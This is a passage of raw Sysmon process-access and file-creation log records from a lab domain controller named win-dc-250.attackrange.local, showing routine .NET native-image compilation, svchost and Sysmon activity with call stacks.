10341000x80000000000000007311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:01.237{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45F1-6000-3603-000000009A01}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:01.237{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-45F1-6000-3603-000000009A01}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:06.862{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45F6-6000-3803-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:06.847{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45F6-6000-3803-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:06.847{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-45F6-6000-3803-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:06.331{08A6967A-45F1-6000-3703-000000009A01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12c0-0\System.dll2021-01-14 13:24:06.331 10341000x80000000000000007322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:07.128{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45F7-6000-3903-000000009A01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:07.112{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45F7-6000-3903-000000009A01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:07.112{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-45F7-6000-3903-000000009A01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:10.878{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45FA-6000-3A03-000000009A01}2112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:10.878{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45FA-6000-3A03-000000009A01}2112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:10.878{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-45FA-6000-3A03-000000009A01}2112C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:24:10.644{08A6967A-45F7-6000-3903-000000009A01}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\11c8-0\System.Xml.dll2021-01-14 13:24:10.644 10341000x80000000000000007329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:11.039{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45FB-6000-3B03-000000009A01}2432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:11.019{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45FB-6000-3B03-000000009A01}2432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:11.019{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-45FB-6000-3B03-000000009A01}2432C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007356Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-45FF-6000-3D03-000000009A01}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007355Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007354Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007353Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007352Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007351Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007350Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007349Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007348Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007347Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:24:15.879{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll